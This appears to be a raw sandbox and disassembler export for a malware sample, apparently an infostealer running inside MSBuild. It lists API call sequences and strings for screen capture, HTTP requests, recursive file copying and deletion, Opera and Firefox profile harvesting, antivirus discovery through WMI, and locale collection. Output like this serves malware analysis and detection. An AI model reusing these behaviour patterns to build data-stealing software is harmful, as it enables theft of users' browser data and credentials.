                                                                                        • API String ID: 103870964-2848263008
                                                                                        • Opcode ID: 17b6025013d19771342505bce037e7501b215a9a2c06ee1d8103fd0691f27d35
                                                                                        • Instruction ID: 4f3ba6799c96e4c8b2fdef7625ad27d3c1a7b3744a2bb23c5cf2dc8a64d10888
                                                                                        • Opcode Fuzzy Hash: 17b6025013d19771342505bce037e7501b215a9a2c06ee1d8103fd0691f27d35
                                                                                        • Instruction Fuzzy Hash: AA818472A10218ABCB24FBB1DC45DEE777DBF44304F44557AF506A2091EF38AA48CBA5
                                                                                        APIs
                                                                                        • GetDesktopWindow.USER32 ref: 0041159C
                                                                                        • GetWindowRect.USER32(00000000,?), ref: 004115A9
                                                                                        • GetDC.USER32(00000000), ref: 004115B0
                                                                                        • CreateCompatibleDC.GDI32(00000000), ref: 004115B9
                                                                                        • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 004115CA
                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 004115D5
                                                                                        • BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,00CC0020), ref: 004115F5
                                                                                        • GlobalFix.KERNEL32(00000043), ref: 0041165B
                                                                                        • GlobalSize.KERNEL32(00000043), ref: 00411668
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2343717434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CompatibleCreateGlobalWindow$BitmapDesktopObjectRectSelectSize
                                                                                        • String ID: image/jpeg$poAC$poAC
                                                                                        • API String ID: 536084594-2740837080
                                                                                        • Opcode ID: 9371277ee36957b3521b6ffa37a4afbb8a9808b039b2cf45441d82480e80f604
                                                                                        • Instruction ID: defcd3f450e1372c84fb34f4d7ba74a0fd3369ce25f5533fa2b14cfeea203380
                                                                                        • Opcode Fuzzy Hash: 9371277ee36957b3521b6ffa37a4afbb8a9808b039b2cf45441d82480e80f604
                                                                                        • Instruction Fuzzy Hash: 275133B6900208AFDB14EFB5DC49EEE77BDEF88711F005529FA01E2290DB3499448BA4
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2343717434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: /$UT
                                                                                        • API String ID: 0-1626504983
                                                                                        • Opcode ID: f1844ba8d307be4bb8c9dfc5fa30b6fb925a5f90da864f4c250fcf0ebdf003f7
                                                                                        • Instruction ID: fc7b41ddac4b8287914dd5b35c20cb5f85a9e29a538cbd7399227cbcd4b87930
                                                                                        • Opcode Fuzzy Hash: f1844ba8d307be4bb8c9dfc5fa30b6fb925a5f90da864f4c250fcf0ebdf003f7
                                                                                        • Instruction Fuzzy Hash: 30420571A003598BCB25CF69DC807EEBBB5FF89304F1480AEE84897341D7389A95CB94
                                                                                        APIs
                                                                                          • Part of subcall function 0040F850: lstrcpyA.KERNEL32(00000000,?,?), ref: 0040F878
                                                                                          • Part of subcall function 00403D70: ??_U@YAPAXI@Z.MSVCRT ref: 00403DA2
                                                                                          • Part of subcall function 00403D70: ??_U@YAPAXI@Z.MSVCRT ref: 00403DAF
                                                                                          • Part of subcall function 00403D70: ??_U@YAPAXI@Z.MSVCRT ref: 00403DBC
                                                                                          • Part of subcall function 00403D70: lstrlenA.KERNEL32(00000000,00000000,0000003C,00000000,?,00000030), ref: 00403DD6
                                                                                          • Part of subcall function 00403D70: InternetCrackUrlA.WININET(00000000,00000000), ref: 00403DE6
                                                                                          • Part of subcall function 0040F810: lstrcpyA.KERNEL32(00000000,0041760D,0041760D,004201E9), ref: 0040F839
                                                                                        • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00405062
                                                                                        • StrCmpCA.SHLWAPI(?,0169A3B0,?,?,?,?,?,?,?), ref: 0040507A
                                                                                        • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 004050A2
                                                                                        • HttpOpenRequestA.WININET(00000000,GET,?,0169B128,00000000,00000000,-00400100,00000000), ref: 004050DC
                                                                                        • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405100
                                                                                        • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040510F
                                                                                        • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 0040512E
                                                                                        • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00405177
                                                                                        • InternetReadFile.WININET(00000000,00000000,000007CF,?), ref: 004051C5
                                                                                        • InternetCloseHandle.WININET(00000000), ref: 004051D0
                                                                                        • InternetCloseHandle.WININET(?), ref: 004051DA
                                                                                        • InternetCloseHandle.WININET(00000000), ref: 004051E4
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2343717434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Internet$CloseHandleHttp$FileOpenReadRequestlstrcpy$ConnectCrackInfoOptionQuerySendlstrlen
                                                                                        • String ID: ERROR$GET
                                                                                        • API String ID: 1863336362-3591763792
                                                                                        • Opcode ID: 0f67009fbf7cbbc68c08b1a8f3387cfa7beef474e4c265804f63dc4e633702b9
                                                                                        • Instruction ID: 1ac627e5dad41aa046ddd859517fa52cc070feb9a932d89590bb6b8620beea7d
                                                                                        • Opcode Fuzzy Hash: 0f67009fbf7cbbc68c08b1a8f3387cfa7beef474e4c265804f63dc4e633702b9
                                                                                        • Instruction Fuzzy Hash: 1F515472A406186BEB20EB64DC46FEF7779EF44700F104139F605BB2D1DB786A058BA9
                                                                                        APIs
                                                                                          • Part of subcall function 0040F810: lstrcpyA.KERNEL32(00000000,0041760D,0041760D,004201E9), ref: 0040F839
                                                                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004201E0,?,00401CE9,?,004201E0,?,?,00000000,?,00000000), ref: 004012D9
                                                                                        • StrCmpCA.SHLWAPI(?,004201DC), ref: 004012FC
                                                                                        • StrCmpCA.SHLWAPI(?,004201D8), ref: 00401316
                                                                                        • FindFirstFileA.KERNEL32(00000000,?,?,?,?,004201E0,?,00401CE9,?,004201E0,?,?,?,004201E0,?,?), ref: 0040140D
                                                                                          • Part of subcall function 00410D50: SHGetFolderPathA.SHELL32(00000000,004201E9,00000000,00000000,?,00000000,?), ref: 00410D81
                                                                                          • Part of subcall function 0040F940: lstrcpyA.KERNEL32(00000000,?,00000000,004176BE), ref: 0040F981
                                                                                          • Part of subcall function 0040F940: lstrcatA.KERNEL32(00000000), ref: 0040F98D
                                                                                          • Part of subcall function 0040F8F0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F930
                                                                                        • DeleteFileA.KERNEL32(00000000), ref: 00401668
                                                                                        • FindNextFileA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 004016A4
                                                                                        • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?), ref: 004016B3
                                                                                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 004015F6
                                                                                          • Part of subcall function 0040F850: lstrcpyA.KERNEL32(00000000,?,?), ref: 0040F878
                                                                                          • Part of subcall function 00406C20: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,0040BA32,?,00000000,?,00000000,00000000), ref: 00406C3F
                                                                                          • Part of subcall function 00406C20: GetFileSizeEx.KERNEL32(00000000,?,?,0040BA32,?,00000000,?,00000000,00000000,?), ref: 00406C55
                                                                                          • Part of subcall function 00406C20: LocalAlloc.KERNEL32(00000040,?,?,?,0040BA32,?,00000000,?,00000000,00000000,?), ref: 00406C70
                                                                                          • Part of subcall function 00406C20: ReadFile.KERNEL32(00000000,00000000,?,?,00000000,?,0040BA32,?,00000000,?,00000000,00000000,?), ref: 00406C89
                                                                                          • Part of subcall function 00406C20: CloseHandle.KERNEL32(00000000,?,0040BA32,?,00000000,?,00000000,00000000,?), ref: 00406CB1
                                                                                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 004018F5
                                                                                          • Part of subcall function 00406C20: LocalFree.KERNEL32(?,?,0040BA32,?,00000000,?,00000000,00000000,?), ref: 00406CA9
                                                                                        • DeleteFileA.KERNEL32(00000000), ref: 00401967
                                                                                        • FindNextFileA.KERNEL32(00000000,?), ref: 004019A8
                                                                                        • FindClose.KERNEL32(00000000), ref: 004019B7
                                                                                          • Part of subcall function 004142A0: Sleep.KERNEL32(000003E8,?,=OA,?,?,00000000), ref: 00414345
                                                                                          • Part of subcall function 004142A0: CreateThread.KERNEL32(00000000,00000000,004130F0,?,00000000,00000000), ref: 0041438D
                                                                                          • Part of subcall function 004142A0: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00414399
                                                                                          • Part of subcall function 0040F9A0: lstrlenA.KERNEL32(?,?,?,?,?,00417633,?,0168EE78,?,00423414,?,00000000,004201E9), ref: 0040F9B9
                                                                                          • Part of subcall function 0040F9A0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F9E1
                                                                                          • Part of subcall function 0040F9A0: lstrcatA.KERNEL32(?,?), ref: 0040F9EB
                                                                                          • Part of subcall function 00410D10: GetFileAttributesA.KERNEL32(00000000,?,?,0040B844,?,00000000,?,00000000,004201E9,004201E9), ref: 00410D1D
                                                                                          • Part of subcall function 00410B80: GetSystemTime.KERNEL32(004201E9,0168FCC0,004201E9,?,00000030,004201E9,004201E9,?,00000000,?,?,004176BE), ref: 00410BA9
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2343717434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: File$Find$lstrcpy$Close$CopyCreateDeleteFirstLocalNextlstrcat$AllocAttributesFolderFreeHandleObjectPathReadSingleSizeSleepSystemThreadTimeWaitlstrlen
                                                                                        • String ID: \*.*
                                                                                        • API String ID: 2220404975-1173974218
                                                                                        • Opcode ID: b43918595e2391cb9db23ad8454a5d140223a2460fb525dc9aab70f32623a2f9
                                                                                        • Instruction ID: 1d754b9f1f181e8b004311f1424a94fcc02efae78f4dcff2990e7204b081244d
                                                                                        • Opcode Fuzzy Hash: b43918595e2391cb9db23ad8454a5d140223a2460fb525dc9aab70f32623a2f9
                                                                                        • Instruction Fuzzy Hash: FF3202729101186ADB28FBA1DC52EEE7378AF54304F54817EB506764D2EF386B4CCB68
                                                                                        APIs
                                                                                        • wsprintfA.USER32 ref: 004156DF
                                                                                        • FindFirstFileA.KERNEL32(?,?), ref: 004156F6
                                                                                        • StrCmpCA.SHLWAPI(?,004201DC), ref: 0041571C
                                                                                        • StrCmpCA.SHLWAPI(?,004201D8), ref: 00415736
                                                                                        • lstrcatA.KERNEL32(?,0169A440,?,00000104,?,00000104), ref: 00415774
                                                                                        • lstrcatA.KERNEL32(?,0169A320), ref: 00415788
                                                                                        • lstrcatA.KERNEL32(?,?), ref: 0041579C
                                                                                        • lstrcatA.KERNEL32(?,?), ref: 004157AA
                                                                                        • lstrcatA.KERNEL32(?,004201E0), ref: 004157BC
                                                                                        • lstrcatA.KERNEL32(?,?), ref: 004157D0
                                                                                          • Part of subcall function 0040F810: lstrcpyA.KERNEL32(00000000,0041760D,0041760D,004201E9), ref: 0040F839
                                                                                          • Part of subcall function 00406C20: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,0040BA32,?,00000000,?,00000000,00000000), ref: 00406C3F
                                                                                          • Part of subcall function 00406C20: GetFileSizeEx.KERNEL32(00000000,?,?,0040BA32,?,00000000,?,00000000,00000000,?), ref: 00406C55
                                                                                          • Part of subcall function 00406C20: LocalAlloc.KERNEL32(00000040,?,?,?,0040BA32,?,00000000,?,00000000,00000000,?), ref: 00406C70
                                                                                          • Part of subcall function 00406C20: ReadFile.KERNEL32(00000000,00000000,?,?,00000000,?,0040BA32,?,00000000,?,00000000,00000000,?), ref: 00406C89
                                                                                          • Part of subcall function 00406C20: CloseHandle.KERNEL32(00000000,?,0040BA32,?,00000000,?,00000000,00000000,?), ref: 00406CB1
                                                                                          • Part of subcall function 004142A0: Sleep.KERNEL32(000003E8,?,=OA,?,?,00000000), ref: 00414345
                                                                                          • Part of subcall function 004142A0: CreateThread.KERNEL32(00000000,00000000,004130F0,?,00000000,00000000), ref: 0041438D
                                                                                          • Part of subcall function 004142A0: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00414399
                                                                                        • FindNextFileA.KERNEL32(00000000,?), ref: 00415863
                                                                                        • FindClose.KERNEL32(00000000), ref: 00415872
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2343717434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: lstrcat$File$Find$CloseCreate$AllocFirstHandleLocalNextObjectReadSingleSizeSleepThreadWaitlstrcpywsprintf
                                                                                        • String ID: %s\%s
                                                                                        • API String ID: 1833283839-4073750446
                                                                                        • Opcode ID: e31d2834b5800846581c50843b59fcb23822e472b9e87247f18449742fc92fff
                                                                                        • Instruction ID: 0b78cd701ac643c87a03d62035dd32dfabddf56532c9e59c0612692b5200a2eb
                                                                                        • Opcode Fuzzy Hash: e31d2834b5800846581c50843b59fcb23822e472b9e87247f18449742fc92fff
                                                                                        • Instruction Fuzzy Hash: 9B41BAB2510218ABCB14FBB0DC85DEE337DAF84304F4485ADF605A2091EB749B88CFA5
                                                                                        APIs
                                                                                        • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 0041541D
                                                                                        • memset.MSVCRT ref: 0041543E
                                                                                        • GetDriveTypeA.KERNEL32(00000000,?,?,00000000), ref: 00415447
                                                                                        • lstrcpyA.KERNEL32(?,00000000,?,?,00000000), ref: 00415466
                                                                                        • lstrcpyA.KERNEL32(?,00000000,?,?,00000000), ref: 00415484
                                                                                        • lstrcpyA.KERNEL32(?,00000000,?,?,?,?,?,00000000), ref: 004154A7
                                                                                        • lstrlenA.KERNEL32(00000000), ref: 0041550E
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2343717434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: lstrcpy$Drive$LogicalStringsTypelstrlenmemset
                                                                                        • String ID: %DRIVE_FIXED%$%DRIVE_REMOVABLE%$*%DRIVE_FIXED%*$*%DRIVE_REMOVABLE%*$pVA
                                                                                        • API String ID: 1884655365-1202875852
                                                                                        • Opcode ID: 651858862d990c101e44fd5ff59ef2c2d412456b491b06cbe97d18b12f29a8ec
                                                                                        • Instruction ID: bbf7442ac75b1dedefd6e11ab23fcaa94ebd49349dc0b1136d9cad4923d5d44c
                                                                                        • Opcode Fuzzy Hash: 651858862d990c101e44fd5ff59ef2c2d412456b491b06cbe97d18b12f29a8ec
                                                                                        • Instruction Fuzzy Hash: 87516671600244ABDB70FF71DC86FEE3369AF44704F50803AFA0966192DF786A49CB69
                                                                                        APIs
                                                                                          • Part of subcall function 0040F810: lstrcpyA.KERNEL32(00000000,0041760D,0041760D,004201E9), ref: 0040F839
                                                                                          • Part of subcall function 0040F940: lstrcpyA.KERNEL32(00000000,?,00000000,004176BE), ref: 0040F981
                                                                                          • Part of subcall function 0040F940: lstrcatA.KERNEL32(00000000), ref: 0040F98D
                                                                                          • Part of subcall function 0040F9A0: lstrlenA.KERNEL32(?,?,?,?,?,00417633,?,0168EE78,?,00423414,?,00000000,004201E9), ref: 0040F9B9
                                                                                          • Part of subcall function 0040F9A0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F9E1
                                                                                          • Part of subcall function 0040F9A0: lstrcatA.KERNEL32(?,?), ref: 0040F9EB
                                                                                          • Part of subcall function 0040F8F0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F930
                                                                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,004201E9,00000000,?,?), ref: 0040A322
                                                                                        • StrCmpCA.SHLWAPI(?,004201DC), ref: 0040A34C
                                                                                        • StrCmpCA.SHLWAPI(?,004201D8), ref: 0040A366
                                                                                        • StrCmpCA.SHLWAPI(00000000,Opera,004201E9,004201E9,004201E9,004201E9,004201E9,004201E9,004201E9), ref: 0040A3DD
                                                                                        • StrCmpCA.SHLWAPI(00000000,Opera GX), ref: 0040A3F1
                                                                                        • StrCmpCA.SHLWAPI(00000000,Opera Crypto), ref: 0040A405
                                                                                          • Part of subcall function 0040F850: lstrcpyA.KERNEL32(00000000,?,?), ref: 0040F878
                                                                                          • Part of subcall function 00410D10: GetFileAttributesA.KERNEL32(00000000,?,?,0040B844,?,00000000,?,00000000,004201E9,004201E9), ref: 00410D1D
                                                                                          • Part of subcall function 00409D40: FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,004201E9,?,75B0AC90,?), ref: 00409D8B
                                                                                          • Part of subcall function 00409D40: StrCmpCA.SHLWAPI(?,004201DC), ref: 00409DAE
                                                                                          • Part of subcall function 00409D40: StrCmpCA.SHLWAPI(?,004201D8), ref: 00409DC8
                                                                                        • FindNextFileA.KERNEL32(?,?), ref: 0040A984
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2343717434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: lstrcpy$File$Find$Firstlstrcat$AttributesNextlstrlen
                                                                                        • String ID: Opera$Opera Crypto$Opera GX$\*.*
                                                                                        • API String ID: 3824151033-1710495004
                                                                                        • Opcode ID: 889923f85667ea30386d2ce6e40a168aeccca771022b4310aab7c130cc17b7e2
                                                                                        • Instruction ID: c055696588133eeff082df826d79585fe0f613ba782fed39e499d95d60d79d7b
                                                                                        • Opcode Fuzzy Hash: 889923f85667ea30386d2ce6e40a168aeccca771022b4310aab7c130cc17b7e2
                                                                                        • Instruction Fuzzy Hash: 5A1233729101086BCB28FB71DC52EED7378AF54704F40857EB506729D2EF786A4CCAA9
                                                                                        APIs
                                                                                        • CoInitializeEx.OLE32(00000000,00000000,00000000,?,00000030,?,00000000,?,AV: ,00000000,?,00423408,00000000,?,00000000,00000000), ref: 00410928
                                                                                        • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,00000030,?,00000000,?,AV: ,00000000), ref: 00410939
                                                                                        • CoCreateInstance.OLE32(004249C0,00000000,00000001,004248F0,00000000,?,00000030,?,00000000,?,AV: ,00000000,?,00423408,00000000,?), ref: 00410953
                                                                                        • CoSetProxyBlanket.OLE32(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,00000030,?,00000000,?,AV: ,00000000,?), ref: 0041098C
                                                                                        • VariantInit.OLEAUT32(?), ref: 004109E3
                                                                                          • Part of subcall function 00410CF0: LocalAlloc.KERNEL32(00000040,00000005,00000000,?,00410A09,00000030,?,00000030,?,00000000,?,AV: ,00000000,?,00423408,00000000), ref: 00410CF8
                                                                                          • Part of subcall function 00410CF0: CharToOemW.USER32(?,00000000), ref: 00410D05
                                                                                          • Part of subcall function 0040F810: lstrcpyA.KERNEL32(00000000,0041760D,0041760D,004201E9), ref: 0040F839
                                                                                        • VariantClear.OLEAUT32(?), ref: 00410A1B
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2343717434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: InitializeVariant$AllocBlanketCharClearCreateInitInstanceLocalProxySecuritylstrcpy
                                                                                        • String ID: Select * From AntiVirusProduct$Unknown$WQL$displayName$root\SecurityCenter2
                                                                                        • API String ID: 685420537-2561087649
                                                                                        • Opcode ID: 87aa53400a99d5c291a18064c614467eeea5bc9e82735329bb1475dada1603e8
                                                                                        • Instruction ID: 111392f2127a0d2122f17b414c1528a281c0ab609e0c548076d9d5dfd58a5577
                                                                                        • Opcode Fuzzy Hash: 87aa53400a99d5c291a18064c614467eeea5bc9e82735329bb1475dada1603e8
                                                                                        • Instruction Fuzzy Hash: A9415F71A01225ABCB20DB95DC45EEFBBBCEF49B60F10421AF515A7280C775AA41CBA4
                                                                                        APIs
                                                                                          • Part of subcall function 0040F810: lstrcpyA.KERNEL32(00000000,0041760D,0041760D,004201E9), ref: 0040F839
                                                                                          • Part of subcall function 0040F940: lstrcpyA.KERNEL32(00000000,?,00000000,004176BE), ref: 0040F981
                                                                                          • Part of subcall function 0040F940: lstrcatA.KERNEL32(00000000), ref: 0040F98D
                                                                                          • Part of subcall function 0040F9A0: lstrlenA.KERNEL32(?,?,?,?,?,00417633,?,0168EE78,?,00423414,?,00000000,004201E9), ref: 0040F9B9
                                                                                          • Part of subcall function 0040F9A0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F9E1
                                                                                          • Part of subcall function 0040F9A0: lstrcatA.KERNEL32(?,?), ref: 0040F9EB
                                                                                          • Part of subcall function 0040F8F0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F930
                                                                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004234C0,004201E9,00000000,?,?), ref: 0040B3F2
                                                                                        • StrCmpCA.SHLWAPI(?,004201DC), ref: 0040B41C
                                                                                        • StrCmpCA.SHLWAPI(?,004201D8), ref: 0040B436
                                                                                        • StrCmpCA.SHLWAPI(?,prefs.js,00000000,?,?,?,004201E0,?,?,004201E9), ref: 0040B4B0
                                                                                          • Part of subcall function 00410B80: GetSystemTime.KERNEL32(004201E9,0168FCC0,004201E9,?,00000030,004201E9,004201E9,?,00000000,?,?,004176BE), ref: 00410BA9
                                                                                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040B562
                                                                                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040B59A
                                                                                        • DeleteFileA.KERNEL32(00000000,?,004201E9), ref: 0040B63E
                                                                                          • Part of subcall function 0040F850: lstrcpyA.KERNEL32(00000000,?,?), ref: 0040F878
                                                                                          • Part of subcall function 004110F0: memset.MSVCRT ref: 0041110A
                                                                                          • Part of subcall function 004110F0: GetProcessHeap.KERNEL32(00000000,000000FA,00000000,00000000,?,00409753,00409C77), ref: 0041113D
                                                                                          • Part of subcall function 004110F0: HeapAlloc.KERNEL32(00000000,?,00409753,00409C77), ref: 00411144
                                                                                          • Part of subcall function 004110F0: wsprintfW.USER32 ref: 00411153
                                                                                          • Part of subcall function 004110F0: OpenProcess.KERNEL32(00001001,00000000,?,?), ref: 004111BB
                                                                                          • Part of subcall function 004110F0: TerminateProcess.KERNEL32(00000000,00000000,?,?), ref: 004111CA
                                                                                          • Part of subcall function 004110F0: CloseHandle.KERNEL32(00000000,?,?), ref: 004111D1
                                                                                        • FindNextFileA.KERNELBASE(00000000,?), ref: 0040B6F5
                                                                                        • FindClose.KERNEL32(00000000), ref: 0040B704
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2343717434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Filelstrcpy$FindProcess$CloseCopyHeaplstrcat$AllocDeleteFirstHandleNextOpenSystemTerminateTimelstrlenmemsetwsprintf
                                                                                        • String ID: prefs.js
                                                                                        • API String ID: 874672723-3783873740
                                                                                        • Opcode ID: 5dccad2cdc090ff762bdfdcd86304b64a5550157acf92d62edbe24b0dda0dcf2
                                                                                        • Instruction ID: 4260c9570d047cb4ee5d2090f2cf981c79b292f60dd583d0dc47953d2b0846df
                                                                                        • Opcode Fuzzy Hash: 5dccad2cdc090ff762bdfdcd86304b64a5550157acf92d62edbe24b0dda0dcf2
                                                                                        • Instruction Fuzzy Hash: C2A11E72910108ABCB24FB71DC56AEE7778AF54304F40853EE905B35D2EF386A4DCA99
                                                                                        APIs
                                                                                          • Part of subcall function 0040F810: lstrcpyA.KERNEL32(00000000,0041760D,0041760D,004201E9), ref: 0040F839
                                                                                          • Part of subcall function 0040F940: lstrcpyA.KERNEL32(00000000,?,00000000,004176BE), ref: 0040F981
                                                                                          • Part of subcall function 0040F940: lstrcatA.KERNEL32(00000000), ref: 0040F98D
                                                                                          • Part of subcall function 0040F9A0: lstrlenA.KERNEL32(?,?,?,?,?,00417633,?,0168EE78,?,00423414,?,00000000,004201E9), ref: 0040F9B9
                                                                                          • Part of subcall function 0040F9A0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F9E1
                                                                                          • Part of subcall function 0040F9A0: lstrcatA.KERNEL32(?,?), ref: 0040F9EB
                                                                                          • Part of subcall function 0040F8F0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F930
                                                                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004234C0,004201E9,?), ref: 00409A50
                                                                                        • StrCmpCA.SHLWAPI(?,004201DC), ref: 00409A6D
                                                                                        • StrCmpCA.SHLWAPI(?,004201D8), ref: 00409A87
                                                                                        • StrCmpCA.SHLWAPI(?,0169A518,00000000,?,?,?,004201E0,?,?,004201E9), ref: 00409B03
                                                                                        • StrCmpCA.SHLWAPI(?,01699D48), ref: 00409B69
                                                                                          • Part of subcall function 0040F850: lstrcpyA.KERNEL32(00000000,?,?), ref: 0040F878
                                                                                          • Part of subcall function 00408DD0: CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00408E75
                                                                                          • Part of subcall function 00408DD0: CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00408EAA
                                                                                        • FindNextFileA.KERNELBASE(00000000,?), ref: 00409CDF
                                                                                        • FindClose.KERNEL32(00000000), ref: 00409CEE
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2343717434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: lstrcpy$File$Find$Copylstrcat$CloseFirstNextlstrlen
                                                                                        • String ID:
                                                                                        • API String ID: 1309316030-0
                                                                                        • Opcode ID: 9b9e51895c0420d9448e1988449149efec611e2b48949a7b5df7ff6d24a7b9e6
                                                                                        • Instruction ID: 9bfd207ce50c0c1877f45400523c984a60adf101312f3de179d0de13c9639d5b
                                                                                        • Opcode Fuzzy Hash: 9b9e51895c0420d9448e1988449149efec611e2b48949a7b5df7ff6d24a7b9e6
                                                                                        • Instruction Fuzzy Hash: EB911F72900108A7CB24FB71DC569EE777DAB44744F40863EF902A29D6EF789A0C8695
                                                                                        APIs
                                                                                          • Part of subcall function 0040F810: lstrcpyA.KERNEL32(00000000,0041760D,0041760D,004201E9), ref: 0040F839
                                                                                        • GetKeyboardLayoutList.USER32(00000000,00000000,004201E9,00000000,?,00000030), ref: 0040FC4D
                                                                                        • LocalAlloc.KERNEL32(00000040,00000000,?,00000030), ref: 0040FC5F
                                                                                        • GetKeyboardLayoutList.USER32(00000000,00000000,?,00000030), ref: 0040FC69
                                                                                        • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200,?,00000030), ref: 0040FC93
                                                                                          • Part of subcall function 0040F9A0: lstrlenA.KERNEL32(?,?,?,?,?,00417633,?,0168EE78,?,00423414,?,00000000,004201E9), ref: 0040F9B9
                                                                                          • Part of subcall function 0040F9A0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F9E1
                                                                                          • Part of subcall function 0040F9A0: lstrcatA.KERNEL32(?,?), ref: 0040F9EB
                                                                                          • Part of subcall function 0040F8F0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F930
                                                                                        • LocalFree.KERNEL32(00000000,?,00000030), ref: 0040FD16
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2343717434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                        Yara matches
                                                                                        Similarity
